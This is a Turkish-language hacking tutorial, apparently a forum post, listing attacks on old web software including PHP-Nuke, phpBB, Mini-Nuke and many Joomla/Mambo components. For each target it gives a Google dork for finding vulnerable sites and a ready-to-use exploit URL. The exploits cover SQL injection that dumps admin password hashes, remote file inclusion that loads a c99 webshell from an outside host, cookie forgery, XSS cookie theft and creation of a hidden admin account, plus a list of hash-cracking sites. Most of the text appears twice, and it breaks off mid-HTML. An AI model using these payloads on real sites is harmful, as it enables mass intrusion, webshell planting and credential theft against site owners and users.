Mini nuke sitelerle uğraşmak için ilk önce
wwww.Google.com a giriyoruz ve: ’mini-nuke v2.3’ olarak aratıyoruz.
Karşımıza gelen sitelerin sonuna
:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1
Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.
MD5 i kırmak içinde
http://passcrack.spb.ru
http://gdataonline.com
http://us.md5.crysm.net
http://md5.rednoize.com
http://ice.breaker.free.fr
http://www.milw0rm.com/md5/
http://shm.hard-core.pl/md5/
http://www.hashchecker.com
http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
http://md5.benramsey.com
http://md5.altervista.org
http://shm.hard-core.pl
http://plain-text.info
www.md5lookup.com
www.passcracking.ru
www.md5lookup.com
www.passcracking.ru/
http://www.securitystats.com/tools/hashcrack.php
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-VİRTUAL WAR V.1.0
ilk önce www.google.com ’Powered by: Virtual War v1.5.0’
Sonu /war.php olan siteleri seçiyoruz ve
war.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: //www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.
Artık admin palenelindeyiz
[Eski bir açık olduğu için sonuç alamayabilirsiniz]
---------------------------------------------------------------------------
---
-PHPBB 2.0.11
işte meşhur phpbb açığı
Bize gereken en önemli program :
http://www.topshareware.com/cookie-E...nsfer-4659.htm [Cooike Editör]
Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.
Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından
kurban phpbb 2.0.11 sitemizi seçicez.
Sitemizi bulduk 2 kez tıklıyoruz.
Önümüze a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bs%3A0%3A%2 2“%3Bs%3A6%3A“userid“%3B s%3A1%3A“2“%3B%7D Gibi Abudik
Kubidik Kodlar Gelicek Üssteki Kodu Slip
a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bb%3A1%3Bs% 3A6%3A“userid“%3Bs%3A1%3A% 222“%3B%7D Bu kodu yeryeştiriyoruz
Saveliyoruz.
Artık cooike editör ile işimiz bitti
Sitemizi yeniliyoruz bakıyoruz aaaa adminiz
---------------------------------------------------------------------------
-----
-PHP NUKE SQL INJECTİON
www.googLe.com a giriyoruz aranacak kelimeye
’PHP-Nuke Copyright © 2004 by Francisco Burzi’ yazıyoruz.
Bulduğumuz sitenin search bölümüne ’p0gg0nsee%’) UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*’ yazmamız kafi
Search bölümünü bulamadıysanız
www.hackleneceksite.com/modules.php?name=Search
Adminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.
---------------------------------------------------------------------------
------
-COM_REMOSİTORY
wWW.Google.com ’’inurl:"com_remository"
Bulduğumuz sitelere
http://[sitepath]/http://[sitepath]/[/URL][joomlapat....php?mosConfig _absolute_path=http://site/phpshell.php
Kodunu ekliyoruz...
---------------------------------------------------------------------------
-----------
-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT
WWW.Google.Com ’inurl:modules/myAds/’
Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.
http://www.site.com/modules/myAds/an...rs+limit+1*1/*
Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...
---------------------------------------------------------------------------
-------------
-TOPLİST HACK PHPBB
GoogLe Arama : inurl:"toplist.php" "powered by phpbb"
Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls
---------------------------------------------------------------------------
--------------
- PC_COOKBOOK JOOMLA COMPONENT
- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities
- Author: JaheeMCreW
- Uygulama : pc_cookbook Component
- Version : koyans 0.3
Yapmaniz gereken bir arama moturunda örnek google’ da
" allinurl:com_pccookbook " olarak aratmaktir..
Exploit :
http://[target]/http://[target]/[/URL][path]/compo...osConfig_absol ute_path=http://evilscript
---------------------------------------------------------------------------
-------------
-SİMPLE BOARD MAMBO
İlk Önce WwwW.GoogLe.com
Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...
http://site.com/components/com_simpl...me%20-a;id;pwd
---------------------------------------------------------------------------
-------------
-ShoutBox IncLusion
shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...
Code:
/shoutbox/expanded.php?conf=
GoogLe Arama : inurl:"/shoutbox/expanded.php?"
---------------------------------------------------------------------------
--------------
-PHPBAZAR <= 2.1.0 Remote File INCLLUSION
Google Search=inurl:classified.php phpbazar
http://hedefsite.com/classified_righ...ell.txt?cmd=id
---------------------------------------------------------------------------
---------------
-BoastMachine [bmachine]
yeni gözde blog sistemi olan bmachine’in 2.8 versiyonunda bulunan ufak bi açık :
site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin
şifresini görüyoruz : )
---------------------------------------------------------------------------
----------------
-Limbo CMS <= 1.04 Remote File Inclusion
GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls
---------------------------------------------------------------------------
-----------------
-CaLogic Calendars V1.2.2 - Remote File Include
GoogLe Arama : CaLogic Calendars V1.2.2
kullanmak için :
http://site.com/[path]/reconfig....1;evil_script]
http://site.com/[path]/srxclr.ph...1;evil_script]
---------------------------------------------------------------------------
------------------
-PafileDB Remote File Inclusion [phpBB]
PhpBB SiteLerde PafileDB ’deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..
http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= http://[attacker]
---------------------------------------------------------------------------
-------------------
-JetBox CMS Remote File Include [ RFI ]
Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..
Uretici Firma : http://jetbox.streamedge.com/
JetBox CMS Remote File Include
http://[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..
GoogLe arama : Powered by Jetbox
---------------------------------------------------------------------------
---------------------
Aratma Kodu : PHP Upload Center v2.0
Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt?
---------------------------------------------------------------------------------------------Kurbanın BilgiLerını ogrenme
http://geobytes.com/Iplocator.htm
http://www.ip2********.com/free.asp
--------------------------------------------------------------------------------------------
RFİ Acıkları
çııÖÖçşGoogle Araması:
inurl:index.php?option=com_simpleboard
KOD:
/components/com_simpleboard/file_upload.php?sbp=http://hitbaytar.kayyo.com/c99shell.txt?
---------------------------------------------------------------
Google Araması:
inurl:"com_hashcash"
KOD:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
------------------------------------------------------------------------------
Google Araması:
inurl:"com_htmlarea3_xtd-c"
KOD:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
------------------------------------------------------------------------------------
Google Araması:
inurl:"com_sitemap"
KOD:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
--------------------------------------------------------------------
Google Araması:
inurl:"com_forum"
KOD:
/components/com_forum/download.php?phpbb_root_path=http://hitbaytar.kayyo.com/c99shell.txt?
--------------------------------------------------------------------
Google Araması:
inurl:"com_pccookbook"
KOD:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------------------
Google Araması:
inurl:index.php?option=com_extcalendar
KOD:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"minibb"
KOD:
components/minibb/index.php?absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_colophon"
KOD:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_mgm"
KOD:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_mambatstaff"
KOD:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_securityimages"
KOD:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
KOD:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_artlinks"
KOD:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http: //hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_galleria"
KOD:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
---------------------------------------------------------------------
Google Araması:
inurl:"com_smf"
KOD:
/components/com_smf/smf.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
KOD:
/modules/mod_calendar.php?absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_pollxt"
KOD:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_loudmounth"
KOD:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
------------------------------------------------------------------------
Google Araması:
inurl:"com_videodb"
KOD:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:index.php?option=com_pcchess
KOD:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_multibanners"
KOD:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_a6mambohelpdesk"
KOD:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://hitbaytar.kayyo.com/c99shell.txt?
çııÖÖçşÇok basit bir sistem içinde birçok sql injection ve cross-site scripting açıkları var.
/antiboard.php?thread_id=1%20UNION%20ALL%20select%2 0field%20from%20whatever--&mode=threaded&sort_order=
/antiboard.php?range=all&mode=threaded&thread_id=1& reply=1&parent_id=1%20UNION%20ALL%20select%20field %20from% 20whatever--
/antiboard.php?range=all&thread_id=1%20UNION%20ALL% 20select%20field%20from% 20whatever--&sort_order=ASC&mode=threaded
/antiboard.php?thread_id=1&parent_id=1%20UNION%20AL L%20select%20field%20from% 20whatever--&mode=nested&reply=1
XSS attack : http://../antiboard.php?thread_id=1&mode=threaded&range=&fee dback=< script>alert(********.cookie);</script>
SQL Injection açığı
http://www.siteadı.com/modules.php?...xLG51b GwvKjox
------------------------------------------------
SQL Injection açığı 2
http://www.siteadı.com/modules.php?...0nu ke_authors
-----------------------------------------------
SQL Injection açığı 3
http://www.siteadı.com/modules.php?...%20nuk e_users
-------------------------------------------------
SQL Injection açığı 4
http://www.siteadı.com/modules.php?...OM%20nuke_users
Bu yöntem çok eski bir yöntem ama verdiğim açıklar 2004 yılına uygundur bazı siteler için.
Kod:
http://www.siteninadı.com/phpnukeyo...=f00&score=9999
Kod:
http://www.siteninadı.com/phpnuke yolu/modules.php?name=Reviews&rop=savecomment&id=1&unam e=f00bar&score=999999999999999999999999
sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&titl e=a
bu kod çalışmazsa geri tuşuna basın bidaha ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir
admin.php yoluna ulaşmak
Kod:
http://www.siteninadı.com/phpnukeyo...php?op=F**CatGo
http://www.siteninadı.com/phpnukeyo...n.php/index.php
http://www.siteninadı.com/phpnukeyo...s.php/admin.php
bu tehlikeli açıklardan biridir phpnuke portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya yada kod bilgisayarınıza iner oto çalıştırılabilir
Kod:
http://www.siteninadı.com/phpnukeyo...iniz.com/dizin/
http://www.siteninadı.com/phpnukeyo...h=//saldırganın ip si/bilgisayardaki klasörün adı/
cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs
Kod:
http://wwwsiteninadı.com/nukeyolu/m...e=thread&order=[xss
code here]&thold=0
http://www.siteninadı.com/nukeyolu/...d&order=&thold=[xss
code here]
http://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20**********ale rt(********.cookie);</script>
http://www.siteninadı.com/nukeyolu/...d=1&show=foobar
modules.php yardımıyla siteden bilgi çalma yönetim paneline login vs.vs
Kod:
http://www.siteninadı.com/nukeyolu/...HERE/**/radmins
uper=1/**/LIMIT/**/1/*
cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması
Kod:
http://siteninadı.com/nukeyolu/inde...pcHQ%2bZm9vYmFy
sql injection açığı
database modifiye edilmeye olanak verir admin eklenebilir ve önemli bilgilere ulaşılabilir hash özel mesja yoluyla alınır
Kod:
http://www.siteninadı.com/nukeyolu/...xLG51b GwvKjox
admin oluşturma
Kod:
http://www.siteninadı.com/nukeyolu/...0VMRUNUIDEvKjox
kullanıcı adı dropby23 şifre 12345 olur
image tagların arasına eklenicek kodla admin eklenmesi [.img]kod[./img] gibi
Kod:
http://www.example.com/admin.php?op...d_radminsuper=1
kullanııc adı dropby23 şifre 12345 olur
img taglarla belirlenmiş kod admin tarafından okunduğunda god admin olursunuz ve silinemezsiniz
search engine açığı md5 e ulaşmak
devamı extradan
Kod:
http://www.siteninadı.com/nukeyolu/search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1) /*"
error.php açığı devamlı hata vermesini sağlar sitenin
wwww.Google.com a giriyoruz ve: ’mini-nuke v2.3’ olarak aratıyoruz.
Karşımıza gelen sitelerin sonuna
:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1
Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.
MD5 i kırmak içinde
http://passcrack.spb.ru
http://gdataonline.com
http://us.md5.crysm.net
http://md5.rednoize.com
http://ice.breaker.free.fr
http://www.milw0rm.com/md5/
http://shm.hard-core.pl/md5/
http://www.hashchecker.com
http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
http://md5.benramsey.com
http://md5.altervista.org
http://shm.hard-core.pl
http://plain-text.info
www.md5lookup.com
www.passcracking.ru
www.md5lookup.com
www.passcracking.ru/
http://www.securitystats.com/tools/hashcrack.php
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-VİRTUAL WAR V.1.0
ilk önce www.google.com ’Powered by: Virtual War v1.5.0’
Sonu /war.php olan siteleri seçiyoruz ve
war.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: //www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.
Artık admin palenelindeyiz
[Eski bir açık olduğu için sonuç alamayabilirsiniz]
---------------------------------------------------------------------------
---
-PHPBB 2.0.11
işte meşhur phpbb açığı
Bize gereken en önemli program :
http://www.topshareware.com/cookie-E...nsfer-4659.htm [Cooike Editör]
Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.
Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından
kurban phpbb 2.0.11 sitemizi seçicez.
Sitemizi bulduk 2 kez tıklıyoruz.
Önümüze a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bs%3A0%3A%2 2“%3Bs%3A6%3A“userid“%3B s%3A1%3A“2“%3B%7D Gibi Abudik
Kubidik Kodlar Gelicek Üssteki Kodu Slip
a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bb%3A1%3Bs% 3A6%3A“userid“%3Bs%3A1%3A% 222“%3B%7D Bu kodu yeryeştiriyoruz
Saveliyoruz.
Artık cooike editör ile işimiz bitti
Sitemizi yeniliyoruz bakıyoruz aaaa adminiz
---------------------------------------------------------------------------
-----
-PHP NUKE SQL INJECTİON
www.googLe.com a giriyoruz aranacak kelimeye
’PHP-Nuke Copyright © 2004 by Francisco Burzi’ yazıyoruz.
Bulduğumuz sitenin search bölümüne ’p0gg0nsee%’) UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*’ yazmamız kafi
Search bölümünü bulamadıysanız
www.hackleneceksite.com/modules.php?name=Search
Adminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.
---------------------------------------------------------------------------
------
-COM_REMOSİTORY
wWW.Google.com ’’inurl:"com_remository"
Bulduğumuz sitelere
http://[sitepath]/http://[sitepath]/[/URL][joomlapat....php?mosConfig _absolute_path=http://site/phpshell.php
Kodunu ekliyoruz...
---------------------------------------------------------------------------
-----------
-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT
WWW.Google.Com ’inurl:modules/myAds/’
Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.
http://www.site.com/modules/myAds/an...rs+limit+1*1/*
Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...
---------------------------------------------------------------------------
-------------
-TOPLİST HACK PHPBB
GoogLe Arama : inurl:"toplist.php" "powered by phpbb"
Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls
---------------------------------------------------------------------------
--------------
- PC_COOKBOOK JOOMLA COMPONENT
- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities
- Author: JaheeMCreW
- Uygulama : pc_cookbook Component
- Version : koyans 0.3
Yapmaniz gereken bir arama moturunda örnek google’ da
" allinurl:com_pccookbook " olarak aratmaktir..
Exploit :
http://[target]/http://[target]/[/URL][path]/compo...osConfig_absol ute_path=http://evilscript
---------------------------------------------------------------------------
-------------
-SİMPLE BOARD MAMBO
İlk Önce WwwW.GoogLe.com
Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...
http://site.com/components/com_simpl...me%20-a;id;pwd
---------------------------------------------------------------------------
-------------
-ShoutBox IncLusion
shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...
Code:
/shoutbox/expanded.php?conf=
GoogLe Arama : inurl:"/shoutbox/expanded.php?"
---------------------------------------------------------------------------
--------------
-PHPBAZAR <= 2.1.0 Remote File INCLLUSION
Google Search=inurl:classified.php phpbazar
http://hedefsite.com/classified_righ...ell.txt?cmd=id
---------------------------------------------------------------------------
---------------
-BoastMachine [bmachine]
yeni gözde blog sistemi olan bmachine’in 2.8 versiyonunda bulunan ufak bi açık :
site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin
şifresini görüyoruz : )
---------------------------------------------------------------------------
----------------
-Limbo CMS <= 1.04 Remote File Inclusion
GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls
---------------------------------------------------------------------------
-----------------
-CaLogic Calendars V1.2.2 - Remote File Include
GoogLe Arama : CaLogic Calendars V1.2.2
kullanmak için :
http://site.com/[path]/reconfig....1;evil_script]
http://site.com/[path]/srxclr.ph...1;evil_script]
---------------------------------------------------------------------------
------------------
-PafileDB Remote File Inclusion [phpBB]
PhpBB SiteLerde PafileDB ’deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..
http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= http://[attacker]
---------------------------------------------------------------------------
-------------------
-JetBox CMS Remote File Include [ RFI ]
Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..
Uretici Firma : http://jetbox.streamedge.com/
JetBox CMS Remote File Include
http://[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..
GoogLe arama : Powered by Jetbox
---------------------------------------------------------------------------
---------------------
Aratma Kodu : PHP Upload Center v2.0
Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt?
---------------------------------------------------------------------------------------------Kurbanın BilgiLerını ogrenme
http://geobytes.com/Iplocator.htm
http://www.ip2********.com/free.asp
--------------------------------------------------------------------------------------------
RFİ Acıkları
çııÖÖçşGoogle Araması:
inurl:index.php?option=com_simpleboard
KOD:
/components/com_simpleboard/file_upload.php?sbp=http://hitbaytar.kayyo.com/c99shell.txt?
---------------------------------------------------------------
Google Araması:
inurl:"com_hashcash"
KOD:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
------------------------------------------------------------------------------
Google Araması:
inurl:"com_htmlarea3_xtd-c"
KOD:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
------------------------------------------------------------------------------------
Google Araması:
inurl:"com_sitemap"
KOD:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
--------------------------------------------------------------------
Google Araması:
inurl:"com_forum"
KOD:
/components/com_forum/download.php?phpbb_root_path=http://hitbaytar.kayyo.com/c99shell.txt?
--------------------------------------------------------------------
Google Araması:
inurl:"com_pccookbook"
KOD:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------------------
Google Araması:
inurl:index.php?option=com_extcalendar
KOD:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"minibb"
KOD:
components/minibb/index.php?absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_colophon"
KOD:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_mgm"
KOD:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_mambatstaff"
KOD:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_securityimages"
KOD:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
KOD:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_artlinks"
KOD:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http: //hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_galleria"
KOD:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
---------------------------------------------------------------------
Google Araması:
inurl:"com_smf"
KOD:
/components/com_smf/smf.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
KOD:
/modules/mod_calendar.php?absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_pollxt"
KOD:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_loudmounth"
KOD:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
------------------------------------------------------------------------
Google Araması:
inurl:"com_videodb"
KOD:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:index.php?option=com_pcchess
KOD:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_multibanners"
KOD:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://hitbaytar.kayyo.com/c99shell.txt?
-----------------------------------------------------------------------
Google Araması:
inurl:"com_a6mambohelpdesk"
KOD:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://hitbaytar.kayyo.com/c99shell.txt?
çııÖÖçşÇok basit bir sistem içinde birçok sql injection ve cross-site scripting açıkları var.
/antiboard.php?thread_id=1%20UNION%20ALL%20select%2 0field%20from%20whatever--&mode=threaded&sort_order=
/antiboard.php?range=all&mode=threaded&thread_id=1& reply=1&parent_id=1%20UNION%20ALL%20select%20field %20from% 20whatever--
/antiboard.php?range=all&thread_id=1%20UNION%20ALL% 20select%20field%20from% 20whatever--&sort_order=ASC&mode=threaded
/antiboard.php?thread_id=1&parent_id=1%20UNION%20AL L%20select%20field%20from% 20whatever--&mode=nested&reply=1
XSS attack : http://../antiboard.php?thread_id=1&mode=threaded&range=&fee dback=< script>alert(********.cookie);</script>
SQL Injection açığı
http://www.siteadı.com/modules.php?...xLG51b GwvKjox
------------------------------------------------
SQL Injection açığı 2
http://www.siteadı.com/modules.php?...0nu ke_authors
-----------------------------------------------
SQL Injection açığı 3
http://www.siteadı.com/modules.php?...%20nuk e_users
-------------------------------------------------
SQL Injection açığı 4
http://www.siteadı.com/modules.php?...OM%20nuke_users
Bu yöntem çok eski bir yöntem ama verdiğim açıklar 2004 yılına uygundur bazı siteler için.
Kod:
http://www.siteninadı.com/phpnukeyo...=f00&score=9999
Kod:
http://www.siteninadı.com/phpnuke yolu/modules.php?name=Reviews&rop=savecomment&id=1&unam e=f00bar&score=999999999999999999999999
sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&titl e=a
bu kod çalışmazsa geri tuşuna basın bidaha ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir
admin.php yoluna ulaşmak
Kod:
http://www.siteninadı.com/phpnukeyo...php?op=F**CatGo
http://www.siteninadı.com/phpnukeyo...n.php/index.php
http://www.siteninadı.com/phpnukeyo...s.php/admin.php
bu tehlikeli açıklardan biridir phpnuke portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya yada kod bilgisayarınıza iner oto çalıştırılabilir
Kod:
http://www.siteninadı.com/phpnukeyo...iniz.com/dizin/
http://www.siteninadı.com/phpnukeyo...h=//saldırganın ip si/bilgisayardaki klasörün adı/
cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs
Kod:
http://wwwsiteninadı.com/nukeyolu/m...e=thread&order=[xss
code here]&thold=0
http://www.siteninadı.com/nukeyolu/...d&order=&thold=[xss
code here]
http://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20**********ale rt(********.cookie);</script>
http://www.siteninadı.com/nukeyolu/...d=1&show=foobar
modules.php yardımıyla siteden bilgi çalma yönetim paneline login vs.vs
Kod:
http://www.siteninadı.com/nukeyolu/...HERE/**/radmins
uper=1/**/LIMIT/**/1/*
cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması
Kod:
http://siteninadı.com/nukeyolu/inde...pcHQ%2bZm9vYmFy
sql injection açığı
database modifiye edilmeye olanak verir admin eklenebilir ve önemli bilgilere ulaşılabilir hash özel mesja yoluyla alınır
Kod:
http://www.siteninadı.com/nukeyolu/...xLG51b GwvKjox
admin oluşturma
Kod:
http://www.siteninadı.com/nukeyolu/...0VMRUNUIDEvKjox
kullanıcı adı dropby23 şifre 12345 olur
image tagların arasına eklenicek kodla admin eklenmesi [.img]kod[./img] gibi
Kod:
http://www.example.com/admin.php?op...d_radminsuper=1
kullanııc adı dropby23 şifre 12345 olur
img taglarla belirlenmiş kod admin tarafından okunduğunda god admin olursunuz ve silinemezsiniz
search engine açığı md5 e ulaşmak
devamı extradan
Kod:
http://www.siteninadı.com/nukeyolu/search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1) /*"
error.php açığı devamlı hata vermesini sağlar sitenin
Kod:
http://www.siteninadı.com/phpyolu/error.php?newlang=dropby23
yukardaki kodla etkilenmiş siteyi aşağıdaki kodla bi index.hrm hazırlayın ve sadece ona tıklamanız yeterli adminsiniz
Kod:
<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
